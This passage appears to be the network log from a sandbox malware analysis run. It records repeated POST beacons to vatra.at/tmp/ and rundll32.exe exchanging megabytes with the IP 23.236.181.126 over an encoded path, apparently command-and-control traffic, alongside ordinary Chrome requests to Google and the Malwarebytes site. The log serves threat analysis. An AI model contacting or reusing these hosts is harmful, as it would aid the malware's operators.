                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      823 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      713 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      860 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      706 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 23.236.181.126:443
                                                                                                                                                                      https://23.236.181.126/15xiW+BIFu4CehxXIK6zP9cptAUCnbfRJqwglaWndmvySgK+EsfJbDWQYoDabXLiA0AA7673OwpyOYw+FQqeHbMLrJdzu86qS79QKnsjLIn3L4o0tsF3JdWKzZ7/amDwXqbhezN2lNLEZHxs9BosLFKgb7F6vbEU10hcUTSZag06sZdlLBLPjkwSyA==
                                                                                                                                                                      tls, http
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      125.2kB
                                                                                                                                                                      3.8MB
                                                                                                                                                                      2710
                                                                                                                                                                      3968

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://23.236.181.126/15xiW+BIFu4CehxXIK6zP9cptAUCnbfRJqwglaWndmvySgK+EsfJbDWQYoDabXLiA0AA7673OwpyOYw+FQqeHbMLrJdzu86qS79QKnsjLIn3L4o0tsF3JdWKzZ7/amDwXqbhezN2lNLEZHxs9BosLFKgb7F6vbEU10hcUTSZag06sZdlLBLPjkwSyA==

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      847 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      682 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      768 B
                                                                                                                                                                      450 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      691 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      787 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      876 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      759 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      772 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 127.0.0.1:15570
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                    • 127.0.0.1:1312
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                    • 142.251.36.45:443
                                                                                                                                                                      https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      7.6kB
                                                                                                                                                                      18
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                                                                                                                                                                    • 172.217.168.238:443
                                                                                                                                                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D150%2526e%253D1
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.2kB
                                                                                                                                                                      9.7kB
                                                                                                                                                                      19
                                                                                                                                                                      20

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D150%2526e%253D1
                                                                                                                                                                    • 34.104.35.123:80
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
                                                                                                                                                                      http
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      5.0kB
                                                                                                                                                                      256.7kB
                                                                                                                                                                      100
                                                                                                                                                                      190

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 216.58.208.110:443
                                                                                                                                                                      https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.WEPncdil2Uw.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-eOecLLtOXEl3I3kIuMsKXRkDMmA/cb=gapi.loaded_0
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.2kB
                                                                                                                                                                      44.7kB
                                                                                                                                                                      41
                                                                                                                                                                      42

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.WEPncdil2Uw.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-eOecLLtOXEl3I3kIuMsKXRkDMmA/cb=gapi.loaded_0
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      7.2kB
                                                                                                                                                                      17
                                                                                                                                                                      17

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABBnVwZGF0ZQpnb29nbGVhcGlzA2NvbQAAAQABAAApEAAAAAAAAE4ADABKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.6kB
                                                                                                                                                                      9.0kB
                                                                                                                                                                      26
                                                                                                                                                                      30

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABBnVwZGF0ZQpnb29nbGVhcGlzA2NvbQAAAQABAAApEAAAAAAAAE4ADABKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.4kB
                                                                                                                                                                      8.8kB
                                                                                                                                                                      23
                                                                                                                                                                      27

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      https://ssl.gstatic.com/safebrowsing/csd/client_model_v5_variation_6.pb
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.5kB
                                                                                                                                                                      92.2kB
                                                                                                                                                                      55
                                                                                                                                                                      77

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://ssl.gstatic.com/safebrowsing/csd/client_model_v5_variation_6.pb
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      8.6kB
                                                                                                                                                                      17
                                                                                                                                                                      17

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      20.1kB
                                                                                                                                                                      29
                                                                                                                                                                      31

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSg034PouhJbw4b_J6gQWj_S8YAFNIc2UP1sXKGxP7Q6ea_HdD605Uu&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR7WyhGISk_tuHEjDzrkFE-f6s_IE1sUpJwRRQF&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9BCGbNnts-c5TmQ14zUPB1mChSJdHLbIfedI4RDBBhbYCaaxT7Fwh&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTdx0GZpOzAhKiCNvN8qH0EmjCgz1zgwwFhTtv8fc6MxIB2Adc1xJPF&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ7E5hkTFjYbyZa4TkMj95_LcI7jkYiOtOgiEnOL7z0jO4Qu4dObhl3&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 65.9.86.124:443
                                                                                                                                                                      https://www.malwarebytes.com/images/favicon-32x32.png
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      21.9kB
                                                                                                                                                                      741.5kB
                                                                                                                                                                      357
                                                                                                                                                                      608

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/adwcleaner

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/library/jquery.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/bootstrap_mwb.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/bootstrap_overrides.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/font-awesome.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/styles.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/styles_overrides.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/styles_components.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/master_page.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/component-project/templates/navwrap/masterpage-svg.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/user-experience/animation/animate-on-scroll.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/pages/adwcleaner/index.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/__bundle.css?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uY3NzLC9jc3MveW90cG8uY3NzLC9jc3MvdXNlci1leHBlcmllbmNlL2Nhcm91c2VsL3NsaWNrLm1pbi5jc3MsL2Nzcy91c2VyLWV4cGVyaWVuY2UveW90cG8ubWluLmNzcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uY3NzLC9jb21wb25lbnRzL2NvbHVtbnMvY29sdW1ucy5taW4uY3NzLC9jb21wb25lbnRzL2N0YS1jYWxsb3V0L2N0YS1jYWxsb3V0Lm1pbi5jc3MsL2NvbXBvbmVudHMvdGV4dC1vbmx5L3RleHQtb25seS5taW4uY3NzLC9jb21wb25lbnRzL3RocmVlLWNvbHVtbi10ZXh0LXdpdGgtaWNvbi90aHJlZS1jb2x1bW4tdGV4dC13aXRoLWljb24ubWluLmNzc3wxMzRFNUM0QjZFRkZDNTJDNEExMzFGODI2NTlFMEYyMg==

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/__bundle.js?f=L2pzL3N0cmluZy9zdHJpbmcubWluLmpzLC9qcy9zZXNzaW9uL3Nlc3Npb24ubWluLmpzLC9qcy9jb3VudHJ5Lm1pbi5qcywvanMvZ2xvYmFsX213Yi5taW4uanMsL2pzL3BlcnNvbmFsaXphdGlvbi91c2VyLm1pbi5qcywvanMvbWVkaWEvaW1hZ2VzL2xhenlsb2FkaW5nLm1pbi5qcywvanMvYm9vdHN0cmFwLm1pbi5qcywvanMvbW9kZXJuaXpyLmpzLC9scC9zZW0vYXNzZXRzL2pzL3Jlc3BvbmQubWluLmpzLC9qcy9nbG9iYWwuanMsL2pzL3hzLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL2FuaW1hdGlvbi9hbmltYXRlLW9uLXNjcm9sbC5taW4uanN8MTFBQjcxMjc4MUE2MkQ0MUYwQzM1REExN0E4MzFFNTE=

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/__bundle.js?f=L2pzL3VzZXItZXhwZXJpZW5jZS9hbmltYXRpb24vYW5pbWF0ZS1vbi1zY3JvbGwubWluLmpzLC9qcy91c2VyLWV4cGVyaWVuY2Uvc2Nyb2xsLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL25hdmlnYXRpb24ubWluLmpzfEMwMjFDNzc4NEM5MUNCNTczM0RCODc3REEyMTVERjNE

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/utilities.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/pages/masterpage.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/__bundle.js?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uanMsL2pzL3lvdHBvLXJhdGluZ3MuanMsL2pzL3VzZXItZXhwZXJpZW5jZS9jYXJvdXNlbC9zbGljay5taW4uanMsL2pzL3VzZXItZXhwZXJpZW5jZS95b3Rwby1yYXRpbmdzLm1pbi5qcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uanN8Njg0M0JFMEIzQTdBNjUwRUNCMTlCMzdDNUU2Nzc1QTA=

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/user-experience/tooltip/popper.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/global-phone.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/partners/optimus-systems.webp

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/footer.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/component-project/templates/navwrap/masterpage-svg.svg

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/website-refresh/adwcleaner/adwcleaner_hero_image.jpg

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/rsa2021.jpg

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/website-refresh/adwcleaner/removes_adware_img.webp

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts/graphik-regular.otf

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts/graphik-medium.otf

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts/graphik-semibold.otf

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts/graphik-bold.otf

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts/graphik-light.otf

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts/graphik-lightitalic.otf

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/intl-sites.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/malwarebytes-proxy?endpoint=https%3A%2F%2Fwww-api.malwarebytes.com%2Fjs%2Fjson%2Freviews%2FYOTPO_REVIEW_DATA.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/favicon.ico

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/images/favicon-32x32.png

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 65.9.86.124:443
                                                                                                                                                                      www.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.0kB
                                                                                                                                                                      6.6kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 34.96.102.137:443
                                                                                                                                                                      https://dev.visualwebsiteoptimizer.com/lib/622914.js
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.8kB
                                                                                                                                                                      71.2kB
                                                                                                                                                                      40
                                                                                                                                                                      63

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dev.visualwebsiteoptimizer.com/lib/622914.js
                                                                                                                                                                    • 3.230.18.232:443
                                                                                                                                                                      genesis.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.8kB
                                                                                                                                                                      7.2kB
                                                                                                                                                                      15
                                                                                                                                                                      17
                                                                                                                                                                    • 65.9.86.122:443
                                                                                                                                                                      https://api.demandbase.com/api/v2/ip.json?key=5527c2aa519592df7d44a24d0105731b
                                                                                                                                                                      tls, http
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.8kB
                                                                                                                                                                      9.5kB
                                                                                                                                                                      14
                                                                                                                                                                      16

                                                                                                                                                                      HTTP Request

